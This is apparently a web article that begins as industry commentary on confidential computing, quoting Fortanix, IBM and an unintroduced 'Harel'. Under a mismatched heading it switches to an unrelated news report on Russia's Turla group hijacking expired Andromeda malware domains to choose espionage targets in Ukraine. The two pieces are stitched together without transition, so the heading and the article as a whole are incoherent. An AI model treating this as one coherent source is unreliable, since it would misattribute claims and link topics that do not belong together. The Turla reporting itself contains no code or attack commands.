Cloud security company Fortanix says that financial services in particular should invest in confidential computing, for several reasons: it involves masses of personally identifiable information (PII), it is heavily regulated, its monetary value attracts attention from cyber criminals, and "it's an industry that hasn't figured out a secure way to share valuable data among each other that can be used to detect fraud or money laundering," a Fortanix spokesperson says. Fortanix adds it is also seeing interest in confidential computing from industries with similar characteristics, such as healthcare enterprises and government entities.

"Confidential computing reduces the trusted computing base to the minimum. It takes the trust away from configuration files, and secrets and passwords managed by humans, which can be error-prone. The trust circle is reduced to the CPU, and the application, and everything in between — the operating system, the network, the administrators, can be removed from that trust circle. Confidential computing gets closest to achieving zero trust when establishing communication between app-to-app or machine-to-machine," Fortanix says.

**Complete Control Over Data**

Today's protective solutions are insufficient and leave critical data exposed. Cloud providers AMD, Intel, Google Cloud, Microsoft Azure, Amazon Web Services, Red Hat, and IBM have already deployed confidential computing offerings. A growing number of cybersecurity companies, including Fortinet, Anjuna Security, Gradient Flow, and Hub Security, are also providing such solutions.

Harel says, "Confidential computing is a natural addition to their security arsenal, allowing them to evolve their breach defense and take it to the next level. It allows them to finally protect data in use, after spending decades and billions of dollars protecting data at rest and in transit."

Nataraj Nagaratnam, IBM distinguished engineer and CTO for cloud security, believes that confidential computing is a game-changer, especially because it gives customers complete control of their data. "Confidential computing primarily aims to provide greater assurance to companies that their data in the cloud is protected and confidential. It encourages companies to move more of their sensitive data and computing workloads to public cloud services," he notes.

How Confidential Computing Can Change Cybersecurity

The infamous, FSB-connected Turla group took over other hackers' servers, exploiting their USB drive malware for targeted espionage.

The Russian cyberespionage group known as Turla became infamous in 2008 as the hackers behind agent.btz, a virulent piece of malware that spread through US Department of Defense systems, gaining widespread access via infected USB drives plugged in by unsuspecting Pentagon staffers. Now, 15 years later, the same group appears to be trying a new twist on that trick: hijacking the USB infections of _other_ hackers to piggyback on their infections and stealthily choose their spying targets.

Today, cybersecurity firm Mandiant revealed that it has found an incident in which, it says, Turla's hackers—widely believed to work in the service of Russia’s FSB intelligence agency—gained access to victim networks by registering the expired domains of nearly decade-old cybercriminal malware that spread via infected USB drives. As a result, Turla was able to take over the command-and-control servers for that malware, hermit-crab style, and sift through its victims to find ones worthy of espionage targeting.

That hijacking technique appears designed to let Turla stay undetected, hiding inside other hackers’ footprints while combing through a vast collection of networks. And it shows how the Russian group’s methods have evolved and become far more sophisticated over the past decade and a half, says John Hultquist, who leads intelligence analysis at Mandiant. “Because the malware already proliferated through USB, Turla can leverage that without exposing themselves. Rather than use their own USB tools like agent.btz, they can sit on someone else’s,” Hultquist says. “They’re piggybacking on other people’s operations. It’s a really clever way of doing business.”

Mandiant’s discovery of Turla’s new technique first came to light in September of last year, when the company’s incident responders found a curious breach of a network in Ukraine, a country that’s become a primary focus of all Kremlin intel services after Russia’s catastrophic invasion last February. Several computers on that network had been infected after someone inserted a USB drive into one of their ports and double-clicked on a malicious file on the drive that had been disguised as a folder, installing a piece of malware called Andromeda.

Andromeda is a relatively common banking trojan that cybercriminals have used to steal victims’ credentials since as early as 2013. But on one of the infected machines, Mandiant’s analysts saw that the Andromeda sample had quietly downloaded two other, more interesting pieces of malware. The first, a reconnaissance tool called Kopiluwak, has been previously used by Turla; the second piece of malware, a backdoor known as Quietcanary that compressed and siphoned carefully selected data off the target computer, has been used exclusively by Turla in the past. “That was a red flag for us,” says Mandiant threat intelligence analyst Gabby Roncone.

When Mandiant looked at the command-and-control servers for the Andromeda malware that had started that infection chain, its analysts saw that the domain used to control the Andromeda sample—whose name was a vulgar taunt of the antivirus industry—had actually expired and been reregistered in early 2022. Looking at other Andromeda samples and their command-and-control domains, Mandiant saw that at least two more expired domains had been reregistered. In total, those domains connected to hundreds of Andromeda infections, all of which Turla could sort through to find subjects worthy of their spying.

“By doing this you can basically lay under the radar much better. You’re not spamming a bunch of people, you’re letting someone else spam a bunch of people,” says Hultquist. “Then you started picking and choosing which targets are worth your time and your exposure.”

In fact, Mandiant only found that single instance in Ukraine of the hijacked Andromeda infection distributing Turla’s malware. But the company suspects that there were likely more. Hultquist warns there’s no reason to believe the stealthy targeted spying that piggybacked off Andromeda’s USB infections would be limited to just one target, or even to just Ukraine. “Turla has a global intelligence collection mandate,” he says.

Turla has a long history of using clever tricks to hide the control of its malware, and even to hijack the control of other hackers, as Mandiant saw in this most recent case. Cybersecurity firm Kaspersky revealed in 2015 that Turla had taken control of satellite internet connections to obscure the location of its command-and-control servers. In 2019, Britain’s GCHQ intelligence agency warned that Turla had silently commandeered Iranian hackers’ servers to conceal themselves and confuse detectives trying to identify them.

Those innovative techniques have made the group a particular obsession for many cybersecurity researchers, who have traced its fingerprints all the way back to Moonlight Maze, one of the first-ever state-sponsored hacking campaigns, discovered in the late 1990s. Turla’s agent.btz thumbdrive malware represented another historic moment for the group: It resulted in a Pentagon initiative called Operation Buckshot Yankee, designed to vastly upgrade the Defense Department’s cybersecurity after the group’s embarrassing USB-based breach.

Mandiant’s discovery of another, stealthier USB-based hacking technique in Turla’s hands should serve as a reminder that even now, 15 years later, that USB-based intrusion vector has hardly disappeared. Plug an infected drive into your USB port today, it seems, and you may be offering an invitation to not only undiscerning cybercriminals, but also a far more sophisticated breed of operative hiding behind them.

Tag

#intel